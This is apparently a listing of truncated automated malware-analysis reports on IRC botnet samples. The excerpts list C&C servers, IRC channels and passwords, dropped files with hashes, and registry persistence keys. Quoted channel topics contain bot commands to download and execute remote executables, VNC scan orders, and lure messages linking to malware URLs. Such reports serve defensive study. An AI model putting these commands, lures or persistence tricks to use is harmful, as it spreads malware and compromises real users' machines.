Remote Host Port Number82.146.49.155 6667 PING :ircirc.servebeer.comJOIN ##[ENG]PONG :You have not registeredJOIN #secret videoNICK [ENG][COMPUTERNAME]23717 PASS video File System Modifications * The following file was created in the system: # Filename(s) File Size File Hash1 %AppData%taskmgrtaskmgr.exe[file and pathname of the sample #1] 83 456 bytes MD5: 0x39D08E3693F4C5AA84B90981348AC4B8SHA-1: 0x7A256A381FB118A43F2C9B4F068D1099A449BE3E * Note: o %AppData% is a variableRead more...

Remote Host Port Number193.242.108.49 8066.45.237.212 8064.120.11.167 5900 File System Modifications * The following files were created in the system: # Filename(s) File Size File Hash1 %UserProfile%update.exe 57 387 bytes MD5: 0xD037B4F37AF523C6F7CFB0BA122296A2SHA-1: 0x23CD0E21CF3C0693E2F4ECA7A2DB3B04E43D351E2 c:GardiTuxatbov.exe[file and pathname of the sample #1] 69 632 bytes MD5: 0x99CA8EFB12FB35FA09D10C595EB37DC8SHA-1: 0xA97BE1EBB176D74C6191D17774E1888330CE86FD3 c:GardiTuxatDesKTop.ini 62 bytes MD5: 0x7457A5DF1FF47C957ACF1FA000D7D9ADSHA-1: 0x69D2BBA827FD4DE0169419A0FDA280252B348514 * Note: o %UserProfile%Read more...

* Requested Host: sk1.no-ip.info* Resulting Address: 217.147.29.246 * Unknown Connections o Host By Name: + Requested Host: michael-f156cf7 + Resulting Address: 192.168.1.117 + Requested Host: sk1.no-ip.info + Resulting Address: 217.147.29.246 + Requested Host: www.whatismyip.com + Error Code: WSAHOST_NOT_FOUND + Requested Host: www.whatismyip.com + Resulting Address: 72.233.89.198 + Requested Host: checkip.dyndns.org + Error Code: WSAHOST_NOT_FOUND +Read more...

golpe.dyndns.org 190.121.67.127 * C&C Server: 190.121.67.127:6667 * Server Password: * Username: XP-3233 * Nickname: [DEU|00|P|61069] * Channel: #uNk (Password: test) * Channeltopic: :*.msn.msg hola!!! vas a mirar o no la foto? dale!!!! http://liz2009.fileave.com/foto.exe 😛 🙂 * IRC Data o User Name: XP-9745 o Host Name: * o Server Name: o Real Name: DWI-9625AC2E275 o Password:Read more...

67.228.73.151 (4545) Invisible Users: 23Operators: 8 operator(s) onlineChannels: 3 channels formedClients: I have 22 clients and 1 serversLocal users: Current Local Users: 22 Max: 45Global users: Current Global Users: 30 Max: 53 Now talking in #2Topic On: [ #2 ] [ .find vnc-5900 100 5 0 189.x.x.x ]Topic By: [ systemerror ]Modes On: [#2 ]Read more...

67.202.81.97:6660Nick: [LiQ-Krew]22070Username: eaxaahbJoined Channel: #mscan with Password scanChannel Topic for Channel #mscan: “!scan 94 random 69.x.x.x 3 1”Private Message to Channel #mscan: “[RAGE SCAN:] range: 69.x.x.x/94 threads.”Private Message to User [LiQ-Krew]22070: “VERSION” * IRC Data o User Name: suvhrsg o Host Name: “fo8.net” o Server Name: o Real Name: suvhrsg o Nick Name: [nLh-VNC]uhenwu oRead more...

213.229.187.47:11438 Interesting ports on 213.229.187.47:Not shown: 1692 filtered portsPORT STATE SERVICE VERSION21/tcp open ftp?25/tcp open smtp?80/tcp open http?110/tcp open pop3?443/tcp open https?

Remote Host Port Number66.252.5.52 22322 NICK ModkxitqgdzxjUSER rnipumlhxm “” “sfm” :rnipumlhxmJOIN #darkwar w4rPONG :d30-58-66.gci.net Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87}] + StubPath = “c:CONFIGS-1-5-21-1482476501-1644491937-682003330-1013ConfDriver.exe” so that ConfDriver.exe runs every time Windows starts * The following directories wereRead more...

5854.jivagaming.com 85.234.148.70 * C&C Server: 85.234.148.70:17402 * Server Password: * Username: thegibson * Nickname: [0008][DEU|XP|LAN|76672] * Channel: #rice (Password: ) * Channeltopic: :.stopm2 |.m2 es esta imagen tuya http://noordfoto.com/facebook.php?= |.y es esta imagen tuya http://noordfoto.com/facebook.php?= |.rar |.zip Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “lsass” = lsass.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMMRead more...

project-h4x0r.com 85.234.148.70 * C&C Server: 85.234.148.70:4244 * Server Password: * Username: XP-8755 * Nickname: [DEU|00|P|60691] * Channel: #yakuza (Password: ) * Channeltopic: :~dl.start http://noordfoto.com/facebook.exe C:crz.exe 1 |~dl http://noordfoto.com/facebook.exe C:crz.exe 1